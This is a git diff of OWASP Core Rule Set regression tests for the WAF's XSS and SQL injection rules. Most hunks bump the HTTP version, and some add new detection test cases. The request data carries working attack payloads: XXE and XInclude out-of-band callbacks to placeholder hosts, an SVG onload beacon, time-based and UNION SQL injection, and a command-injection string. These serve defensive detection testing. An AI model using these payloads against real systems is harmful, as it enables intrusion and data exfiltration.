           data: "var=<aai xmlns=\"http://a.b/\" xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xsi:schemaLocation=\"http://a.b/ http://c5ipg3yqo8lcutvn8bghsptofflee424qxdq1f.examplefoo.bar/aai.xsd\">aai</aai>"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [941130]
@@ -66,7 +66,7 @@ tests:
             Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
           uri: "/post"
           data: "var=abcd'||(select extractvalue(xmltype('<?xml version=\"1.0\" encoding=\"UTF-8\"?><!DOCTYPE root [ <!ENTITY % cgger SYSTEM \"http://ved8pm79xruv3c46hup01827oyuzxtlx9qwjk8.example'||'foo.bar/\">%cgger;"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [941130]
@@ -83,7 +83,7 @@ tests:
             Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
           uri: "/post"
           data: "var=<acp xmlns:xi=\"http://www.w3.org/2001/XInclude\"><xi:include href=\"http://sgc5rj96zows5963jrrx3544qvwtnubvzomfa4.examplefoo.bar/foo\"/></acp>"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [941130]
@@ -100,7 +100,7 @@ tests:
             Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
           uri: "/post"
           data: "var=/active/LFI/LFI-Detection-Evaluation-POST-200Valid/content.ini'||(select extractvalue(xmltype('<?xml version=\"1.0\" encoding=\"UTF-8\"?><!DOCTYPE root [ <!ENTITY % grorj SYSTEM \"http://yikbtpbc1uyy7f89lxt35b6as1yw1qpudm0co1.example'||'foo.bar/\">%grorj;"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [941130]
@@ -117,7 +117,7 @@ tests:
             Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
           uri: "/post"
           data: "var=<afa xmlns=\"http://a.b/\" xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xsi:schemaLocation=\"http://a.b/ http://2mpfxtfg5y22bjcdp1x79faew52420q0er1hp6.examplefoo.bar/afa.xsd\">afa</afa>"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [941130]
@@ -134,7 +134,7 @@ tests:
             Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
           uri: "/post"
           data: "var=<chj xmlns=\"http://a.b/\" xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xsi:schemaLocation=\"http://a.b/ http://1pre0sif8x51eifcs006ceddz45084w4kx7ovd.examplefoo.bar/chj.xsd\">chj</chj>"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [941130]
@@ -151,7 +151,7 @@ tests:
             Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
           uri: "/post"
           data: "var=/content.ini'||(select extractvalue(xmltype('<?xml version=\"1.0\" encoding=\"UTF-8\"?><!DOCTYPE root [ <!ENTITY % dwusu SYSTEM \"http://ehzrs5as0axe6v7pkdsj4r5qrhxcp6da12osch.example'||'foo.bar/\">%dwusu;"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [941130]
@@ -168,7 +168,7 @@ tests:
             Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
           uri: "/post"
           data: "var=EmptyValue'||(select extractvalue(xmltype('<?xml version=\"1.0\" encoding=\"UTF-8\"?><!DOCTYPE root [ <!ENTITY % awpsd SYSTEM \"http://0cddnr5evws01h2bfzn5zd0cm3sxvrjv7oufi4.example'||'foo.bar/\">%awpsd;"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [941130]
@@ -185,7 +185,7 @@ tests:
             Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
           uri: "/post"
           data: "var=file:/boot.ini'||(select extractvalue(xmltype('<?xml version=\"1.0\" encoding=\"UTF-8\"?><!DOCTYPE root [ <!ENTITY % cwtpc SYSTEM \"http://gvft67ouecbgkxlryf6litjs5jbd5htlhd43ss.example'||'foo.bar/\">%cwtpc;"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [941130]
@@ -202,7 +202,7 @@ tests:
             Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
           uri: "/post"
           data: "var=Matched Data: <!ENTITY % awfke SYSTEM found within ARGS_NAMES:1'||(select extractvalue(xmltype('<?xml version=\"1.0\" encoding=\"UTF-8\"?><!DOCTYPE root [ <!ENTITY % awfke SYSTEM \"http://gj3tu7cu2czg8x9rmful6t7stjzcp4d812osch.example'||'foo.bar/\">%awfke;"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [941130]
@@ -219,7 +219,7 @@ tests:
             Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
           uri: "/post"
           data: "var=<oez xmlns=\"http://a.b/\" xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xsi:schemaLocation=\"http://a.b/ http://eygr95rshaeenvop1d9jlrmq8hegib6bu4hx5m.examplefoo.bar/oez.xsd\">oez</oez>"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [941130]
@@ -236,7 +236,7 @@ tests:
             Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
           uri: "/post"
           data: "var=(select extractvalue(xmltype('<?xml version=\"1.0\" encoding=\"UTF-8\"?><!DOCTYPE root [ <!ENTITY % anwyn SYSTEM \"http://y98bkp2csupyyfz9cxk3wbxaj1pzuzi26vtohd.example'||'foo.bar/\">%anwyn;"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [941130]
@@ -253,7 +253,7 @@ tests:
             Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
           uri: "/post"
           data: "var=<vqk xmlns:xi=\"http://www.w3.org/2001/XInclude\"><xi:include href=\"http://749kfyxln3k7toui76fcrksjeak3nybzzsmlaa.examplefoo.bar/foo\"/></vqk>"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [941130]
@@ -270,7 +270,7 @@ tests:
             Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
           uri: "/post"
           data: "var=2010-01-01'||(select extractvalue(xmltype('<?xml version=\"1.0\" encoding=\"UTF-8\"?><!DOCTYPE root [ <!ENTITY % fhklu SYSTEM \"http://fzisa6stibffowpq2eakmsnr9ifhii6mueh45t.example'||'foo.bar/\">%fhklu;"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [941130]
@@ -286,7 +286,7 @@ tests:
             User-Agent: "OWASP CRS test agent"
             Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
           uri: "/post/api/v1/query?q=7XMLNS"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             no_expect_ids: [941130]
@@ -303,7 +303,7 @@ tests:
             Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
           uri: "/post"
           data: "var=<chj%0Axmlns=\"http://a.b/\" xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xsi:schemaLocation=\"http://a.b/ http://1pre0sif8x51eifcs006ceddz45084w4kx7ovd.examplefoo.bar/chj.xsd\">chj</chj>"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [941130]
@@ -319,7 +319,41 @@ tests:
             User-Agent: "foo!ENTITY % bar SYSTEM"
             Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
           uri: "/get"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [941130]
+  - test_id: 20
+    desc: "True positive for `pattern` attribute"
+    stages:
+      - input:
+          dest_addr: 127.0.0.1
+          method: POST
+          port: 80
+          headers:
+            Host: localhost
+            User-Agent: "OWASP CRS test agent"
+            Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+          uri: "/post"
+          data: 'var=<input pattern="^a regex$">'
+          version: HTTP/1.1
+        output:
+          log:
+            expect_ids: [941130]
+  - test_id: 21
+    desc: "False positive for `pattern` with `=` following at an arbitrary position later"
+    stages:
+      - input:
+          dest_addr: 127.0.0.1
+          method: POST
+          port: 80
+          headers:
+            Host: localhost
+            User-Agent: "OWASP CRS test agent"
+            Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+          uri: "/post"
+          data: "var=There's a pattern in the dark background. Here's a video: <a href=\\x22https://www.youtube.com/watch?v="
+          version: HTTP/1.1
+        output:
+          log:
+            no_expect_ids: [941130]
diff --git a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941160.yaml b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941160.yaml
index 5f5121ac2..2dace036c 100644
--- a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941160.yaml
+++ b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941160.yaml
@@ -227,7 +227,7 @@ tests:
           port: 80
           uri: "/post"
           data: "var='\"><svg/onload=(new(Image)).src='//m8vzjd10riomx3yxblmcnvaskjghsdz8xorciu7\\56coreruleset.org'>"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [941160]
@@ -243,7 +243,7 @@ tests:
           method: GET
           port: 80
           uri: "/get/index.php/%3Csvg/onload=alert()"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [941160]
@@ -263,3 +263,19 @@ tests:
         output:
           log:
             expect_ids: [941160]
+  - test_id: 17
+    desc: "Test with long event name to trigger 941160: onwebkitplaybacktargetavailabilitychanged"
+    stages:
+      - input:
+          dest_addr: 127.0.0.1
+          method: GET
+          port: 80
+          uri: "/get?body=%3C%22onwebkitplaybacktargetavailabilitychanged%3D"
+          headers:
+            User-Agent: "OWASP CRS test agent"
+            Host: localhost
+            Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+          version: "HTTP/1.1"
+        output:
+          log:
+            expect_ids: [941160]
diff --git a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941180.yaml b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941180.yaml
index a6a7c74f4..6df88d12b 100644
--- a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941180.yaml
+++ b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941180.yaml
@@ -84,7 +84,7 @@ tests:
           port: 80
           uri: "/post"
           data: "var=\"-->'-->`--><!--#set var=\"qjr9\" value=\"kjkjg7sdk\"--><!--#set var=\"fqz7\" value=\"sql4xxaq\"--><!--#echo var=\"qjr9\"--><!--#echo var=\"fq4p\"-->"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [941180]
@@ -121,3 +121,37 @@ tests:
         output:
           log:
             no_expect_ids: [941180]
+  - test_id: 8
+    desc: Node-validator deny list keywords
+    stages:
+      - input:
+          dest_addr: 127.0.0.1
+          method: POST
+          port: 80
+          uri: "/post/bar"
+          headers:
+            User-Agent: "OWASP CRS test agent"
+            Host: localhost
+            Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+          data: 'foo=document.querySelector("p").textContent="XSS"'
+          version: "HTTP/1.1"
+        output:
+          log:
+            expect_ids: [941180]
+  - test_id: 9
+    desc: Node-validator deny list keywords
+    stages:
+      - input:
+          dest_addr: 127.0.0.1
+          method: POST
+          port: 80
+          uri: "/post/bar"
+          headers:
+            User-Agent: "OWASP CRS test agent"
+            Host: localhost
+            Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+          data: 'foo=document.body.appendChild(document.createElement("h1")).textContent = "XSS"'
+          version: "HTTP/1.1"
+        output:
+          log:
+            expect_ids: [941180]
diff --git a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941220.yaml b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941220.yaml
index 1b54be604..939def1a5 100644
--- a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941220.yaml
+++ b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941220.yaml
@@ -16,7 +16,7 @@ tests:
           uri: "/post"
           port: 80
           data: "var=v%26newline;b%26tab;s%26newline;c%26newline;r%26tab;i%26tab;p%26newline;t%26colon;:&var2=whatever"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [941220]
@@ -33,7 +33,7 @@ tests:
           uri: "/post"
           port: 80
           data: "payload=<a href=\"vbscript:MsgBox+1\">XSS</a>"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [941220]
diff --git a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941230.yaml b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941230.yaml
index b6725448e..6e1c70c95 100644
--- a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941230.yaml
+++ b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941230.yaml
@@ -16,7 +16,7 @@ tests:
           port: 80
           uri: "/post"
           data: "var=<embed src=\"deuce.swf\">&var2=whatever"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [941230]
@@ -33,7 +33,7 @@ tests:
           port: 80
           uri: "/post"
           data: "payload=<embed src=\"javascript:alert(1)\"></a>"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [941230]
diff --git a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941240.yaml b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941240.yaml
index 6bd84e2c9..ac0827af0 100644
--- a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941240.yaml
+++ b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941240.yaml
@@ -15,7 +15,7 @@ tests:
           method: GET
           port: 80
           uri: "/get?var=%3c%3fimport%20implementation%20%3d"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [941240]
@@ -31,7 +31,7 @@ tests:
           method: GET
           port: 80
           uri: "/get?test=<importimplementation="
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [941240]
diff --git a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941250.yaml b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941250.yaml
index 6033163b5..24afc3013 100644
--- a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941250.yaml
+++ b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941250.yaml
@@ -16,7 +16,7 @@ tests:
           port: 80
           uri: "/post"
           data: "var=<meta http-equiv=\"refresh\"&foo=var"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [941250]
@@ -33,7 +33,7 @@ tests:
           port: 80
           uri: "/post"
           data: "payload=<meta http-equiv=\"refresh\" content=\"0; http://evil?</a>"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [941250]
diff --git a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941260.yaml b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941260.yaml
index 1cc0cb1dd..1ce5f812f 100644
--- a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941260.yaml
+++ b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941260.yaml
@@ -16,7 +16,7 @@ tests:
           port: 80
           uri: "/post"
           data: "var=<meta charset=\"UTF-8\">&var2=whatever"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [941260]
@@ -33,7 +33,7 @@ tests:
           port: 80
           uri: "/post"
           data: "payload=<meta charset=\"UTF-7\" /> +ADw-script+AD4-alert(1)+ADw-/script+AD4-</a>"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [941260]
diff --git a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941270.yaml b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941270.yaml
index dec041596..24746da90 100644
--- a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941270.yaml
+++ b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941270.yaml
@@ -15,7 +15,7 @@ tests:
           method: GET
           port: 80
           uri: "/get?var=%3clink%20%2f%20asdf%20href%20%20%2f%3d%20"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [941270]
@@ -31,7 +31,7 @@ tests:
           method: POST
           port: 80
           uri: "/post"
-          version: HTTP/1.0
+          version: HTTP/1.1
           data: 'payload=<link href="xss.js" rel=stylesheet type="text/javascript"></a>'
         output:
           log:
diff --git a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941280.yaml b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941280.yaml
index 8d2fa94a2..2f8673342 100644
--- a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941280.yaml
+++ b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941280.yaml
@@ -15,7 +15,7 @@ tests:
           method: GET
           port: 80
           uri: "/get?var=%3cBASE%20dsfds%20HREF%20%2f%20%3d"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [941280]
@@ -33,7 +33,7 @@ tests:
           method: POST
           port: 80
           uri: "/post"
-          version: HTTP/1.0
+          version: HTTP/1.1
           data: 'payload=<a href=abc style="width:101%;height:100%;position:absolute;font-size:1000px;">xss<base href="//evil/</a>'
           autocomplete_headers: false
         output:
diff --git a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941290.yaml b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941290.yaml
index c10eff63a..c76121295 100644
--- a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941290.yaml
+++ b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941290.yaml
@@ -16,7 +16,7 @@ tests:
           port: 80
           uri: "/post"
           data: "var=<applet code%3d\"deuce.class\">&var=whatever"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [941290]
@@ -33,7 +33,7 @@ tests:
           port: 80
           uri: "/post"
           data: "payload=<applet onreadystatechange=alert(1)></applet></a>"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [941290]
diff --git a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941300.yaml b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941300.yaml
index 14f42f240..e7015e068 100644
--- a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941300.yaml
+++ b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941300.yaml
@@ -15,7 +15,7 @@ tests:
           method: GET
           port: 80
           uri: "/get?%3cOBJECT%20data%20%3d=sdffdsa"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [941300]
@@ -31,7 +31,7 @@ tests:
           method: POST
           port: 80
           uri: "/post"
-          version: HTTP/1.0
+          version: HTTP/1.1
           data: "payload=<object data=\"javascript:alert(1)\"></a>"
         output:
           log:
diff --git a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941320.yaml b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941320.yaml
index 65c280f54..0660b93c1 100644
--- a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941320.yaml
+++ b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941320.yaml
@@ -16,7 +16,7 @@ tests:
           port: 80
           uri: "/post"
           data: "var=<noscript#"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [941320]
diff --git a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941330.yaml b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941330.yaml
index 3b360ff29..c131c63d0 100644
--- a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941330.yaml
+++ b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941330.yaml
@@ -15,7 +15,7 @@ tests:
           method: GET
           port: 80
           uri: "/get?var=%22in%20\\u0076\\u0061l\\u0075e\\u004F\\u0066%3d"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [941330]
@@ -31,7 +31,7 @@ tests:
           method: POST
           port: 80
           uri: "/post"
-          version: HTTP/1.0
+          version: HTTP/1.1
           data: "payload=<iframe srcdoc=\"<img src=1 onerror=alert(1)>\"></iframe></a>"
         output:
           log:
diff --git a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941340.yaml b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941340.yaml
index b75576c73..174778fb8 100644
--- a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941340.yaml
+++ b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941340.yaml
@@ -16,7 +16,7 @@ tests:
           port: 80
           uri: "/post"
           data: "var='  infoo.bar=&var2=whatever"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [941340]
@@ -33,7 +33,7 @@ tests:
           port: 80
           uri: "/post"
           data: "payload=<a href=# language=\"JScript.Encode\" onclick=\"#@~^CAAAAA==C^+.D`8#mgIAAA==^#~@\">XSS</a>"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [941340]
diff --git a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941390.yaml b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941390.yaml
index 0de1e929e..4985495b4 100644
--- a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941390.yaml
+++ b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941390.yaml
@@ -1,6 +1,6 @@
 ---
 meta:
-  author: "Franziska Buehler, Xhoenix, azurit"
+  author: "Franziska Buehler, Xhoenix, azurit, Esad Cetiner"
 rule_id: 941390
 tests:
   - test_id: 1
@@ -147,3 +147,43 @@ tests:
         output:
           log:
             expect_ids: [941390]
+  - test_id: 10
+    desc: |
+      Known False positive:
+      Matching `import (` in `if you’re willing to import (and perhaps wait around`
+    stages:
+      - input:
+          dest_addr: 127.0.0.1
+          headers:
+            Host: localhost
+            Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.>"
+            User-Agent: "OWASP CRS test agent"
+          method: POST
+          port: 80
+          uri: "/post"
+          data: |-
+            fp=If you’re looking for a personal recommendation, if you’re willing to import (and perhaps wait around, as they often sell out line has been consistently excellent so far.
+          version: HTTP/1.1
+        output:
+          log:
+            expect_ids: [941390]
+  - test_id: 11
+    desc: |
+      True Positive:
+      Detect import method with curly brackets
+    stages:
+      - input:
+          dest_addr: 127.0.0.1
+          headers:
+            Host: localhost
+            Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.>"
+            User-Agent: "OWASP CRS test agent"
+          method: POST
+          port: 80
+          uri: "/post"
+          data: |-
+            code=import { sayHi, sayBye } from "./greeting.js";
+          version: HTTP/1.1
+        output:
+          log:
+            expect_ids: [941390]
diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942100.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942100.yaml
index e7c61638c..e9d130d16 100644
--- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942100.yaml
+++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942100.yaml
@@ -17,7 +17,7 @@ tests:
           port: 80
           uri: "/post"
           data: "var=1234 OR 1=1"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942100]
@@ -34,7 +34,7 @@ tests:
           port: 80
           uri: "/post"
           data: "var=-1839' or '1'='1"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942100]
@@ -51,7 +51,7 @@ tests:
           port: 80
           uri: "/post"
           data: "var=-1839\" or \"1\"=\"2"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942100]
@@ -68,7 +68,7 @@ tests:
           port: 80
           uri: "/post"
           data: "var=2010-01-01'+sleep(20.to_i)+'"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942100]
@@ -85,7 +85,7 @@ tests:
           port: 80
           uri: "/post"
           data: "var=EmptyValue' and 526=527"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942100]
@@ -102,7 +102,7 @@ tests:
           port: 80
           uri: "/post"
           data: "var=foo') UNION ALL select NULL --"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942100]
@@ -119,7 +119,7 @@ tests:
           port: 80
           uri: "/post"
           data: "var=foo')waitfor%20delay'5%3a0%3a20'--"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942100]
@@ -136,7 +136,7 @@ tests:
           port: 80
           uri: "/post"
           data: "var=JKGHUKGDI8TDHLFJH72FZLFJSKFH' and sleep(12) --"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942100]
@@ -153,7 +153,7 @@ tests:
           port: 80
           uri: "/post"
           data: "var=/path/to/file/unitests.txt') UNION ALL select NULL --"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942100]
@@ -170,7 +170,7 @@ tests:
           port: 80
           uri: "/post"
           data: "1'||(select extractvalue(xmltype('<?xml version=\"1.1\" encoding=\"UTF-8\"?><!DOCTYPE root [ <!ENTITY % toyop SYSTEM \"https://coreruleset.org/\">%toyop;"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942100]
@@ -187,7 +187,7 @@ tests:
           port: 80
           uri: "/post"
           data: "var=sleep(20)"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942100]
@@ -204,7 +204,7 @@ tests:
           port: 80
           uri: "/post"
           data: "var=unittests@coreruleset.org\" sleep(10.to_i) \""
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942100]
@@ -221,7 +221,7 @@ tests:
           port: 80
           uri: "/post"
           data: "var=\" | type %SystemDrive%\\\\config.ini | \""
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942100]
@@ -238,7 +238,7 @@ tests:
           port: 80
           uri: "/post"
           data: "var=\"unittests@coreruleset.org\"')) and (select*from(select(sleep(5)))x) --"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942100]
diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942101.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942101.yaml
index 5af7502c1..c41682194 100644
--- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942101.yaml
+++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942101.yaml
@@ -16,7 +16,7 @@ tests:
           method: POST
           port: 80
           uri: "/post/1234%20OR%201=1"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942101]
@@ -32,7 +32,7 @@ tests:
           method: POST
           port: 80
           uri: "/post/2010-01-01'+sleep(20.to_i)+'"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942101]
@@ -48,7 +48,7 @@ tests:
           method: POST
           port: 80
           uri: "/post/EmptyValue'%20and%20526=527"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942101]
@@ -64,7 +64,7 @@ tests:
           method: POST
           port: 80
           uri: "/post/foo')waitfor%20delay'5%3a0%3a20'--"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942101]
@@ -80,7 +80,7 @@ tests:
           method: POST
           port: 80
           uri: "/post/sleep(20)"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
